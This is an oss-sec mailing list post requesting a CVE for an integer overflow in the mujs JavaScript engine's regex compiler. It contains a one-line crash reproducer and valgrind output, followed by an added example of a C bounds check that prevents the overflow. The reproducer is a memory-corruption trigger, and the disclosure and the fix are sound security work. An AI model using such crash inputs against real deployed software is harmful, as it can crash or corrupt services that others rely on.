oss-sec mailing list archives
CVE request - integer overflow and crash parsing regex in mujs
From: Gustavo Grieco <gustavo.grieco () gmail com>
Date: Sun, 30 Oct 2016 14:29:17 -0300
Hi,
It seems there is an integer overflow somewhere affecting function
js_regcomp (line 843 in regexp.c) in mujs. To reproduce (tested in revision
5c337af4b3df80cf967e4f9f6a21522de84b392a):
$ echo '(/.{135303839468541,43}/);' | valgrind --quiet ./build/mujs
==29376== Argument 'size' of function malloc has a fishy (possibly negative) value: -5152
==29376== at 0x4C2AB8D: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==29376== by 0x415FCC: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376==
==29376== Invalid write of size 2
==29376== at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
==29376== Address 0x2 is not stack'd, malloc'd or (recently) free'd
==29376==
==29376==
==29376== Process terminating with default action of signal 11 (SIGSEGV)
==29376== Access not within mapped region at address 0x2
==29376== at 0x415FE1: js_regcomp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x41D127: js_newregexp (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A0C1: jsR_run (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40A8C6: js_call (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40B9BB: js_pcall (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x401D63: eval_print (in /home/g/Work/Code/mujs/build/mujs)
==29376== by 0x40183A: main (in /home/g/Work/Code/mujs/build/mujs)
This test case was found using QuickFuzz. Please assign a CVE if suitable.
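The report above shows what happens when an unchecked repeat count from a `{min,max}` quantifier feeds the size computation of the compiled program: the count wraps, malloc is handed a negative size, and the subsequent write lands on an unmapped address. The following is an added example of the defensive check a regex compiler needs at that point; it is not mujs's code, and `MAX_REPEAT`, `parse_count`, `parse_repeat`, `repeat_min` and `repeat_max` are names chosen here for illustration.

```c
#include <ctype.h>
#include <limits.h>

/* Hypothetical cap on a bounded repeat count, chosen for this example.
 * Anything above it is rejected before any size arithmetic happens. */
#define MAX_REPEAT 1000

/* Parse the decimal digits of one repeat count. Returns the number of
 * characters consumed, or -1 if there are no digits or the value would
 * exceed MAX_REPEAT. The bound is tested before each multiply-add so the
 * accumulator can never wrap around. */
static int parse_count(const char *s, int *out)
{
    int n = 0, i = 0;
    while (isdigit((unsigned char)s[i])) {
        int d = s[i] - '0';
        if (n > (MAX_REPEAT - d) / 10)   /* n*10 + d would exceed the cap */
            return -1;
        n = n * 10 + d;
        i++;
    }
    if (i == 0)
        return -1;
    *out = n;
    return i;
}

/* Parse a "{min}", "{min,}" or "{min,max}" quantifier starting at s.
 * Returns 1 and fills *min/*max on success (max == -1 means unbounded),
 * 0 if the quantifier is malformed, over the cap, or has max < min. */
int parse_repeat(const char *s, int *min, int *max)
{
    int i = 0, k;
    if (s[i++] != '{') return 0;
    if ((k = parse_count(s + i, min)) < 0) return 0;
    i += k;
    if (s[i] == '}') { *max = *min; return 1; }
    if (s[i++] != ',') return 0;
    if (s[i] == '}') { *max = -1; return 1; }
    if ((k = parse_count(s + i, max)) < 0) return 0;
    i += k;
    if (s[i] != '}') return 0;
    return *max >= *min;
}

/* Convenience wrappers: INT_MIN signals that the quantifier was rejected. */
int repeat_min(const char *s) { int lo, hi; return parse_repeat(s, &lo, &hi) ? lo : INT_MIN; }
int repeat_max(const char *s) { int lo, hi; return parse_repeat(s, &lo, &hi) ? hi : INT_MIN; }
```

With this check in place the quantifier from the crashing input, `{135303839468541,43}`, is rejected as soon as its digits exceed the cap, so no allocation is ever sized from it.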